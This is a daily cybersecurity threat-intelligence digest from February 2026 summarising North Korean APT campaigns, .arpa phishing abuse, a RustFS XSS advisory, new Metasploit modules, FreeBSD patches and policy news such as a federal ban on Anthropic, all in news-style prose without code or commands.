APT37 Ruby Jumper ๐Ÿ”, .arpa TLD abuse ๐ŸŒ, Anthropic AI ban ๐Ÿšซ, RustFS XSS vulnerability ๐Ÿ’ป, The Com arrests ๐Ÿ‘ฎ

Daily Threat Intel Digest - 2026-02-28

๐Ÿ”ด Critical Threats & Active Exploitation

[NEW] North Korean APT37 deploys Ruby Jumper toolkit to breach air-gapped networks
North Korean state actors are exploiting removable media to bridge air-gapped environments in a campaign dubbed Ruby Jumper. The attack begins with malicious LNK files deploying a PowerShell chain that ultimately installs five specialized tools: RESTLEAF for initial compromise, SNAKEDROPPER for payload delivery, THUMBSBD for bidirectional C2 via USB drives, VIRUSTASK for propagation, and FOOTWINE for Android surveillance. THUMBSBD is particularly concerning as it creates hidden directories on USB drives, turning them into covert relays for commands and data exfiltration. The toolkit includes the previously known BLUELIGHT backdoor and targets systems with at least 2GB of free USB storage. Researchers attribute this activity to APT37 based on overlapping TTPs with the group’s historic operations [BleepingComputer].

[NEW] UAT-10027 targets U.S. education and healthcare with DoH-backdoored implants
A sophisticated threat actor, UAT-10027 (believed to be North Korean based on code overlaps with LazarLoader), is deploying the Dohdoor backdoor against U.S. educational institutions and healthcare facilities. The malware uses DNS-over-HTTPS (DoH) for command-and-control, disguising malicious traffic as legitimate connections to Cloudflare infrastructure. Attackers employ DLL side-loading to hijack legitimate Windows executables like Fondue.exe and mblctr.exe, then use an “unhooking” technique to bypass EDR monitoring by removing security hooks from NTDLL.dll. The infection chain involves PowerShell scripts pulling batch files from staging servers, culminating in reflective loading of Cobalt Strike beacons. This campaign’s focus on non-traditional targets like elderly care facilities suggests an expansion of North Korean cyber operations beyond traditional financial and military espionage [SOCFortress].

[UPDATE] RESURGE malware can remain dormant on Ivanti devices for extended periods
CISA has released updated analysis of the RESURGE implant, revealing it can lay dormant on compromised Ivanti Connect Secure devices until attackers establish contact. The malware hooks the accept() function to inspect inbound TLS packets using a CRC32 fingerprinting scheme, waiting for specific connection attempts before activating. RESURGE uses a forged Ivanti certificate for authentication verification but not encryption, establishing Mutual TLS sessions with Elliptic Curve encryption for communication. The implant includes rootkit, bootkit, and proxy capabilities, with a companion SpawnSloth variant (liblogblock.so) for log tampering. CISA warns that devices compromised via CVE-2025-0282 may harbor dormant RESURGE infections that remain an active threat despite remediation efforts [BleepingComputer].

๐ŸŽฏ Threat Actor Activity & Campaigns

[NEW] Phishing campaigns exploit .arpa TLD and IPv6 tunnels to evade security controls
Attackers are weaponizing the .arpa top-level domainโ€”typically reserved for internet infrastructureโ€”to bypass traditional security controls. By obtaining free IPv6 address space and administrative control of corresponding .arpa subdomains, threat actors create malicious ‘A’ records for reverse DNS names (e.g., d.d.e…ip6.arpa) that appear as trusted infrastructure domains. The phishing emails use single images with hidden .arpa links, routing victims through Traffic Distribution Systems that fingerprint devices before redirecting to malicious landing pages. Alongside .arpa abuse, attackers are hijacking dangling CNAME records from expired domains like publicnoticessites[.]com and hobsonsms[.]com to abuse subdomains connected to government agencies, universities, and corporations. Researchers note that .arpa domains rarely trigger reputation blocklists due to their critical role in internet operations [CyberPress].

[NEW] Attackers exploit Windows File Explorer and WebDAV to distribute malware
Cofense Intelligence researchers uncovered an ongoing campaign abusing Windows File Explorer and the legacy WebDAV protocol to distribute Remote Access Trojans (RATs). By exploiting WebDAV, attackers bypass traditional web browser security controls and some Endpoint Detection and Response (EDR) systems. The campaign leverages the protocol’s trusted status within Windows environments to deliver malicious payloads while evading typical security monitoring that focuses on HTTP/HTTPS traffic [GBHackers].

[UPDATE] OpenAI confirms Chinese state-linked hackers exploited ChatGPT for cyber operations
OpenAI has suspended multiple accounts linked to Chinese APT groups that were using ChatGPT to enhance cyberattack capabilities. The threat actors leveraged AI tools to generate and refine phishing emails, translate malicious code components, and simulate attack scenarios targeting defense, technology, and policy sectors. This represents one of the first confirmed cases of state-linked Chinese hackers directly integrating generative AI into tactical cyber operations. Additionally, OpenAI identified a Russian “Rybar” network content farm that used ChatGPT to mass-produce multilingual disinformation and propaganda, though engagement varied significantly depending on account popularity and platform algorithms [CyberPress].

โš ๏ธ Vulnerabilities & Patches

[NEW] Stored XSS in RustFS Console leaks admin S3 credentials (CVE-2026-27822)
A critical stored cross-site scripting vulnerability in RustFS Console versions before 1.0.0-alpha.82 allows attackers to steal administrative S3 credentials, enabling full account takeovers. The flaw occurs in the preview modal component, which renders files like PDFs in iframes without proper content-type validation. Attackers can upload a file named “xss.pdf” containing malicious HTML with text/html metadata; when administrators preview it, the same-origin iframe executes JavaScript that accesses localStorage containing sensitive S3 data (AccessKeyId, SecretAccessKey, SessionToken). The vulnerability has a CVSS v3.1 score of 9.9 and requires immediate upgrading to version 1.0.0-alpha.83, along with implementing origin separation and security headers [CyberPress; GBHackers].

[NEW] Metasploit adds exploits for Ollama AI, BeyondTrust RCE, and ARM64 evasion
Rapid7’s February 2026 Metasploit Framework update introduces several critical exploit modules, including unauthenticated RCE capabilities for Ollama AI infrastructure (CVE-2024-37032) via path traversal in the model pull mechanism. The BeyondTrust Privileged Remote Access and Remote Support exploit modules address the severe command injection vulnerability (CVE-2026-1731). The framework also adds Grandstream GXP1600 VoIP exploitation (CVE-2026-2329) for stack overflow attacks delivering root sessions. Notably, Metasploit introduces its first dedicated Linux evasion module for ARM64 architectures using RC4-encrypted packers and sleep-based tactics to bypass automated security scanners [CyberPress].

[NEW] FreeBSD patches jail escape and routing socket vulnerabilities
FreeBSD released security advisories addressing multiple critical vulnerabilities. CVE-2025-15576 allows jail chroot escapes via file descriptor exchange with different jails, potentially enabling container breakout attacks. CVE-2026-3036 can cause local denial of service and possible privilege escalation through routing sockets. These advisories affect FreeBSD versions 14.3 and 13.5, requiring immediate application of vendor-supplied patches [Malware.news].

๐Ÿ›ก๏ธ Defense & Detection

[NEW] Microsoft testing Windows 11 batch file security hardening
Microsoft is rolling out new Windows 11 Insider Preview builds with enhanced security for batch file execution. Administrators can now enable a more secure processing mode by adding the LockBatchFilesInUse registry value, preventing batch files from being modified during execution. This change, also available via application manifest control, improves performance and security when code integrity is enabled by requiring signature validation only once per file rather than per statement. The feature addresses longstanding concerns about batch file manipulation attacks in enterprise environments [BleepingComputer].

[NEW] Chrome advances quantum-resistant HTTPS with Merkle Tree Certificates
Google announced a multi-phase program to implement quantum-safe HTTPS using Merkle Tree Certificates (MTCs) instead of traditional X.509 certificates with post-quantum cryptography. MTCs replace heavy signature chains with compact Merkle Tree proofs, enabling quantum-resistant algorithms without massive bandwidth penalties. Phase 1 involves feasibility studies with Cloudflare; Phase 2 (Q1 2027) will onboard Certificate Transparency log operators; Phase 3 (Q3 2027) will establish a Chrome Quantum-resistant Root Store (CQRS). The approach emphasizes transparency by default, ACME-only workflows, and reproducible Domain Control Validation [Google Security Blog].

๐Ÿ“‹ Policy & Industry News

[NEW] Trump bans Anthropic AI in federal agencies amid security concerns
The U.S. government has designated Anthropic a supply chain risk to national security, marking the first time a domestic AI firm has received this classification typically reserved for foreign entities like Huawei. President Trump ordered federal agencies to immediately cease using Claude AI, with a six-month phase-out period for dependent departments including the Department of War. The ban stems from Anthropic’s refusal to grant the Pentagon unrestricted access for mass domestic surveillance and autonomous weapons development. Anthropic plans to challenge the designation in court, arguing it legally applies only to DoW contracts under 10 USC 3252. The move could potentially impact Anthropic’s partnerships with cloud providers holding substantial defense contracts [CyberPress; GBHackers].

[NEW] Europol operation arrests 30 members of “The Com” cybercrime network
A yearlong Europol-coordinated operation called “Project Compass” resulted in 30 arrests and identification of 179 suspects connected to “The Com,” a decentralized cybercrime collective targeting children and teenagers. The network operates across social media, gaming platforms, messaging apps, and music streaming services, organized into subgroups including “Cyber Com” (network intrusions and ransomware), “(S)extortion Com” (minors and self-harm promotion), and “Offline Com” (property damage and terrorism). Two alleged leaders of the “764” subgroup, known for grooming minors into producing explicit content, were arrested in April 2025 and face life imprisonment. The group has been linked to high-profile ransomware attacks against Marks & Spencer, Co-op, Harrods, and Las Vegas casinos [BleepingComputer].

[NEW] Datadog report reveals 87% of organizations exposed to exploitable vulnerabilities
Datadog’s State of DevSecOps 2026 report finds that 87% of organizations have at least one exploitable vulnerability affecting 40% of their services. Java services lead with 59% exploitable flaws, followed by .NET at 47% and Rust at 40%. Services using end-of-life (EOL) runtimes show 50% vulnerability rates compared to 37% on supported versions. The report highlights that median dependencies lag 278 days behind latest versions, with Java specifically lagging 492 days. Only 18% of “critical” vulnerabilities remain truly critical after context adjustment based on runtime exposure and exploit availability [CyberPress].